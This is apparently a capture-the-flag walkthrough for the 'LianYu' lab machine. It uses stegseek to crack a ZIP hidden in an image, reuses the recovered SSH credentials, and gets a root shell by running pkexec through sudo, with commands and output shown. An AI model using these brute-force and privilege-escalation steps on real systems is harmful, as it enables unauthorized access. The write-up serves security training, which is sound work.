LianYu
STEGSEEK
- Hidden ZIP inside
[aa.jpg]we can useStegseekto Brute-Force - Extract the File Contents. - Password: M3tahuman
[i] Found passphrase: "password"
[i] Original filename: "ss.zip".
[i] Extracting to "aa.jpg.out".
[+] File: Passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.
[+] File: shado
'M3tahuman'
Privilege Escalation
- Using
SSHCredentials to Login: slade:M3tahuman
slade@LianYu:~$ id
uid=1000(slade) gid=1000(slade) groups=1000(slade),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),115(bluetooth)
- The User
sladecan run: /usr/bin/pkexec as ROOT
slade@LianYu:~$ sudo -l
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
- Using pkexec to Escalate Privileges.
slade@LianYu:~$ sudo /usr/bin/pkexec /bin/bash
root@LianYu:~$ id
uid=0(root) gid=0(root) groups=0(root)